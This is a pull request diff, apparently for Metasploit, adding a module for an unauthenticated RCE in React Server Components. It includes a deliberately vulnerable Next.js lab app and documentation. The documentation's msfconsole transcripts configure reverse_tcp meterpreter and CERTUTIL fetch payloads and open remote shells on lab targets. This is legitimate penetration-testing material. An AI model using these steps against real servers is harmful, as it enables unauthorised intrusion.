Merge pull request #20747 from vognik/2025-55182

Add CVE-2025-55182 / CVE-2025-66478

Author: jheysel-r7

data/exploits/react2shell_unauth_rce_cve_2025_55102/Dockerfile

@@ -0,0 +1,14 @@
+FROM node:18-alpine
+
+WORKDIR /app
+
+COPY package.json ./
+RUN npm install
+
+COPY . .
+
+RUN npm run build
+
+EXPOSE 3000
+
+CMD ["npm", "start"]

data/exploits/react2shell_unauth_rce_cve_2025_55102/index.html

@@ -0,0 +1,12 @@
+<!DOCTYPE html>
+<html lang="en">
+  <head>
+    <meta charset="UTF-8" />
+    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+    <title>React RCE</title>
+  </head>
+  <body>
+    <div id="root"></div>
+    <script type="module" src="/src/main.jsx"></script>
+  </body>
+</html>

data/exploits/react2shell_unauth_rce_cve_2025_55102/next.config.js

@@ -0,0 +1,6 @@
+/** @type {import('next').NextConfig} */
+const nextConfig = {
+  output: 'standalone',
+}
+
+module.exports = nextConfig

data/exploits/react2shell_unauth_rce_cve_2025_55102/package.json

@@ -0,0 +1,22 @@
+{
+  "name": "my-next-app",
+  "version": "0.1.0",
+  "private": true,
+  "scripts": {
+    "dev": "next dev",
+    "build": "next build",
+    "start": "next start",
+    "lint": "next lint"
+  },
+  "dependencies": {
+    "react": "19.0.0",
+    "react-dom": "19.0.0",
+    "next": "15.0.4"
+  },
+  "devDependencies": {
+    "typescript": "^5",
+    "@types/node": "^20",
+    "@types/react": "^18",
+    "@types/react-dom": "^18"
+  }
+}

data/exploits/react2shell_unauth_rce_cve_2025_55102/src/app/actions.tsx

@@ -0,0 +1,5 @@
+"use server";
+
+export async function greet(name: string) {
+  return `Hello, ${name}!`;
+}

data/exploits/react2shell_unauth_rce_cve_2025_55102/src/app/layout.tsx

@@ -0,0 +1,11 @@
+export default function RootLayout({
+  children,
+}: {
+  children: React.ReactNode
+}) {
+  return (
+    <html lang="ru">
+      <body>{children}</body>
+    </html>
+  );
+}

data/exploits/react2shell_unauth_rce_cve_2025_55102/src/app/page.tsx

@@ -0,0 +1,11 @@
+import { greet } from './actions';
+
+export default async function Home() {
+  const greeting = await greet("World");
+  
+  return (
+    <main style={{ padding: '2rem', fontFamily: 'system-ui' }}>
+      <h1>{greeting}</h1>
+    </main>
+  );
+}

data/exploits/react2shell_unauth_rce_cve_2025_55102/tsconfig.json

@@ -0,0 +1,26 @@
+{
+  "compilerOptions": {
+    "lib": ["dom", "dom.iterable", "esnext"],
+    "allowJs": true,
+    "skipLibCheck": true,
+    "strict": true,
+    "noEmit": true,
+    "esModuleInterop": true,
+    "module": "esnext",
+    "moduleResolution": "bundler",
+    "resolveJsonModule": true,
+    "isolatedModules": true,
+    "jsx": "preserve",
+    "incremental": true,
+    "plugins": [
+      {
+        "name": "next"
+      }
+    ],
+    "paths": {
+      "@/*": ["./src/*"]
+    }
+  },
+  "include": ["next-env.d.ts", "**/*.ts", "**/*.tsx", ".next/types/**/*.ts"],
+  "exclude": ["node_modules"]
+}

data/exploits/react2shell_unauth_rce_cve_2025_55102/vite.config.js

@@ -0,0 +1,6 @@
+import { defineConfig } from "vite";
+import react from "@vitejs/plugin-react";
+
+export default defineConfig({
+  plugins: [react()],
+});

documentation/modules/exploit/multi/http/react2shell_unauth_rce_cve_2025_55102.md

@@ -0,0 +1,106 @@
+## Vulnerable Application
+
+A critical unauthenticated Remote Code Execution (RCE) vulnerability exists in React Server
+Components (RSC) Flight protocol. The vulnerability allows attackers to achieve prototype
+pollution during deserialization of RSC payloads by sending specially crafted multipart
+requests with "__proto__", "constructor", or "prototype" as module names.
+
+## Testing
+
+### Linux
+
+1. Open `data\exploits\react2shell_unauth_rce_cve_2025_55102` directory
+2. Build
+```
+docker build -t react2shell .
+```
+3. Run
+```
+docker run -p 3000:3000 react2shell
+```
+4. Open http://127.0.0.1:3000/ and make sure the app is available
+
+### Windows
+
+1. Download and install Node.js https://nodejs.org/en/download
+2. Open `data\exploits\react2shell_unauth_rce_cve_2025_55102` directory
+3. Build the application
+```
+npm run build
+```
+4. Start the application
+```
+npm start
+```
+5. Open http://127.0.0.1:3000/ and make sure the app is available
+
+## Scenario
+
+### Linux
+
+```
+msf6 > use multi/http/react2shell_unauth_rce_cve_2025_55102
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set RHOSTS 172.17.0.1
+RHOSTS => 172.17.0.1
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set RPORT 3000
+RPORT => 3000
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set LPORT 6666
+LPORT => 6666
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set FETCH_SRVPORT 8081
+FETCH_SRVPORT => 8081
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > run
+[*] Started reverse TCP handler on 172.17.0.1:6666 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 4 opened (172.17.0.1:6666 -> 172.17.0.2:59608) at 2025-12-05 01:12:48 -0500
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           :  (Linux 6.11.2-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+### Windows
+
+```
+msf6 > use multi/http/react2shell_unauth_rce_cve_2025_55102_scanner
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set RHOSTS 192.168.19.137
+RHOSTS => 192.168.19.137
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set RPORT 3000
+RPORT => 3000
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set LPORT 6666
+LPORT => 6666
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set target 1
+target => 1
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+payload => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set FETCH_SRVPORT 8082
+FETCH_SRVPORT => 8082
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set FETCH_COMMAND CERTUTIL
+FETCH_COMMAND => CERTUTIL
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > run
+
+[*] Started reverse TCP handler on 192.168.19.130:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Sending stage (203846 bytes) to 192.168.19.137
+[*] Meterpreter session 7 opened (192.168.19.130:4444 -> 192.168.19.137:49835) at 2025-12-05 03:00:47 -0500
+
+meterpreter > getuid
+Server username: DESKTOP-ABCDEF\vognik
+meterpreter > sysinfo
+Computer        : DESKTOP-ABCDEF
+OS              : Windows 10 (10.0 Build 19044).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter >
+```